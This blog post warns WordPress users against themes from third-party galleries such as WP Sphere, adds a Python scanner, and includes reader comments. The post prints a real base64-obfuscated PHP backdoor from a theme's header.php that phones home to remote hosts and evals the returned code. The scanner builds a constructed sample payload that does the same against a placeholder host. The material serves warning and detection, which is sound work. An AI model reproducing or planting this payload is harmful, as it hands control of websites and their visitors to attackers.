Do not download WordPress themes distributed by 3rd party sites

Warning for new and existing WordPress users: DO NOT download WordPress themes from 3rd party "galleries". Identify the original source of the theme and download it directly from the author's website.

As WordPress – both hosted and self-hosted – continues to enjoy explosive growth, exposure to malicious activity and code will increase. Sadly, this applies to both website administrators and visitors. In August I was disappointed to discover that WordPress and Joomla themes were being redistributed with malicious code; code which would track your own visitors or allow for random ads to be served. Since being exposed, the offending website has been taken down. Unfortunately, similar theme galleries have appeared with the same intent to redistribute themes with malicious code.

WP Sphere is distributing WordPress themes with malicious code

Alistair recently tipped me off to another WordPress gallery distributing themes which include malicious code / modifications. The tip from Alistair actually began as a support email:

I have one question about the encoded stuff I saw in the header, [...]

@eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q\
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\
LCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiw\
gJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICR\
SNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3I\
iOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMD\
kxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMk\
QwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1Qj\
M5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRj\
EyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNT\
BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIj\
sgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OT\
cgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3OD\
M2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJF\
JEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9ICIxIjsgIC\
RSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cD\
ovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLm\
NvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waH\
A/dXJsPSIuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXS\
kgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0\
hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRT\
kwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNj\
U2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOU\
I3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQT\
gwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMz\
M1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNT\
BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRk\
U5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdX\
JsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG\
9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIE\
ByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMT\
E1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQk\
MzMDkxNik7'));

After kindly informing Alistair that my theme(s) were not distributed with any code outside of the WordPress scope, I discovered that the code in question was downloaded from WP Sphere. Poking through some of the other recognized themes on the site, I discovered that each of the themes made available for download had been repackaged to include the code above – often in plain view within the header.php file. Paul Carroll took the time to break down what the code above exposes users to.

I think the potential for abuse of this script is huge. I see it as a covert channel to set up WordPress enabled sites as thin zombies. The code being sent back to the server and eval’d could be a mailing script for spam or phishing.

If you have downloaded themes from WP Sphere or any other WordPress themes gallery, exercise caution and inspect the source code. If you are not code proficient, identify the original author and download the theme directly.
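Inspecting a theme by hand means looking for exactly the pattern shown above: an eval() wrapped around base64_decode(), whose decoded payload opens a socket, fetches a remote file and evals or prints it. The following scanner is an added example written for this post, not code from 5ThirtyOne or from any plugin; it decodes such blobs (tolerating the backslash line continuations seen in the listing) and reports which dangerous calls they contain. The sample header.php and the hostname www.example.invalid are constructed for the demonstration.

```python
import base64
import re

# Constructed sample modelled on the header.php pattern described in the post:
# the decoded payload phones home and evals whatever the remote host returns.
# www.example.invalid is a placeholder, not a real site.
_PAYLOAD = (
    'if($c = @fsockopen("www.example.invalid", 80, $e, $s, 3)) '
    '@eval(@file_get_contents("http://www.example.invalid/w1.php?host="'
    '.urlencode($_SERVER["HTTP_HOST"]))); fclose($c);'
)
SAMPLE_HEADER_PHP = (
    "<?php\n"
    "@eval(@base64_decode('" + base64.b64encode(_PAYLOAD.encode()).decode() + "'));\n"
    "?>\n<!DOCTYPE html>\n<html><head><title><?php bloginfo('name'); ?></title></head>\n"
)

# Calls that have no business in a theme file; each one in a decoded payload is a finding.
SUSPICIOUS_CALLS = ("eval", "fsockopen", "file_get_contents", "readfile",
                    "curl_exec", "system", "exec", "shell_exec", "passthru")

# eval(base64_decode('...')), allowing the @ error-suppression prefixes and the
# backslash-newline continuations that appear in the quoted listing.
_EVAL_B64 = re.compile(
    r"@?eval\s*\(\s*@?base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\\\s]+)['\"]\s*\)\s*\)",
    re.DOTALL)

def decode_blob(blob):
    """Strip continuation backslashes and whitespace, then base64-decode."""
    clean = re.sub(r"[\\\s]", "", blob)
    return base64.b64decode(clean).decode("utf-8", errors="replace")

def scan_theme_source(source):
    """Return one finding per eval(base64_decode()) call in a PHP source string."""
    findings = []
    for m in _EVAL_B64.finditer(source):
        payload = decode_blob(m.group(1))
        line = source.count("\n", 0, m.start()) + 1
        calls = sorted({c for c in SUSPICIOUS_CALLS
                        if re.search(r"\b" + c + r"\s*\(", payload)})
        # Leaking $_SERVER values to a URL is the "logging the visit" behaviour.
        findings.append({"line": line, "calls": calls,
                         "phones_home": "$_SERVER" in payload and "http" in payload})
    return findings

if __name__ == "__main__":
    for f in scan_theme_source(SAMPLE_HEADER_PHP):
        print(f"line {f['line']}: eval(base64_decode()) -> {', '.join(f['calls'])}"
              + (" (sends host/URL to a remote server)" if f["phones_home"] else ""))
```

Run it over each .php file in a downloaded theme; a theme that needs none of these calls should produce no findings at all.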

How do you police a non-policed platform?

The growth of a platform enlarges the virtual bull's-eye for malicious individuals to target. How do you protect WordPress users from download sites like WP Sphere or Template Browser? Alistair pointed out that WP Sphere was targeting users by purchasing Google AdWords, strengthening its search presence and increasing the likelihood of attracting organic search engine traffic. How do you fight against such websites?

Only download 5ThirtyOne themes from 5thirtyone.com

I invite WordPress theme authors to make the same recommendation for their visitors – do not download themes from websites other than your own. Additionally, if you are a theme author and discover work being redistributed [without permission] with or without malicious code, contact the offending website host to request that content be taken down.

Unless a 5ThirtyOne theme was officially converted for use on a blogging platform other than WordPress, please download themes from no source other than the links below:

If you’ve recommended WordPress to friends and family, please take the time to check on them or inform them of the dangers of downloading from free theme galleries.

Discuss - 68 Comments

  1. [...] 5thirtyone.com talks about care in downloading themes, explaining how one was hacked. Digging into the malicious code chunk myself, I found that the code goes out and loads a file from one of three sites (logging the visit as well, by the way). Once loaded, the code can be either displayed on the blog, or actually executed. [...]

  2. [...] in the default RSS feed on the WP admin page of almost every WordPress-driven site) and found this post from an open-source theme developer. It seems that some of his themes had been swallowed up by a [...]

  3. [...] a fellow WordPress blogger Mike sent me an article that was written by 5thirtyone which reminds users that you have to be careful where you download your WordPress themes from. I [...]

  4. Ace says:

    Well, it's true that the WordPress theme making community is getting bigger and bigger, and anything that is growing so rapidly is going to have its flaws. The main reason behind this encrypted code is theme sponsoring. Sponsoring?? Well, as a WP theme designer myself, I've had a few sponsors myself for my WordPress themes.

    Many designers make WordPress themes just to get sponsors. I've seen many people making only one theme, changing the colors and the header to make it a new theme (so they say), and getting sponsors. The average sponsor link is worth $30-40, and a sponsored theme has 3-4 such links, making an average revenue of $150 / theme.

    So I haven't explained the reason. Well, the 2 main conditions that are required for a theme to be sponsored by a sponsor are

    1: Encrypted footers
    2: Heavy promotion

    Encrypted footers:
    As you may have, or I must say definitely have, read in this informative article, most new WordPress themes contain such encrypted code. What's behind them is links. Yes, in most cases, and I am not justifying the acts of the people who have done the things in the above article, but I am saying that in this encrypted code are hidden sponsored links which the sponsors have paid for. So why do people encrypt the footers? Well, if you see someone honest using a free theme, they don't remove the footer link, as they know it's someone's hard work, but most people remove the links in the footer, taking the credit themselves. So in a nutshell, it's basically done for sponsoring.

    And as said in the article, you should download themes from the sites of the theme makers, or at least download from a reputable themes gallery.

    Have a nice day.
    Ace.

  5. Thank God, I found this article! A few days back, when I was trying to modify one of my blog’s theme footers (I had to add the sitemeter code next to the footer links), I saw such code. Initially I could not understand anything from that code and hence thought of removing that suspicious long code from the footer.php. But surprisingly my blog went down and it did not open. It was displaying a notice “Theme Error”.

    I could not dare to take any chances. So, I restored the footer.php from the backup via FTP client. And then everything started working normally. After that I simply changed that theme and am now using another one.

    Also, I have seen a few themes with malicious iframe links in the footer. So, it’s a wise idea to check theme files manually before using them.

    • Derek says:

      I know this tip isn’t always ideal for a lot of the bloggers out there, but it’s always a good idea to run anything locally in a test environment before uploading to a live site.

  6. [...] Do not download WordPress themes distributed by 3rd party sites – 5thirtyone.com [...]

  7. Hugh says:

    Yes, I found this out through an article at Theme Labs – they went over the same ground, but also referred to a useful plugin which checks the authenticity of themes and identifies whether and where such malicious code exists.

    It’s a well handy plugin: TAC from http://builtbackwards.com/projects/tac/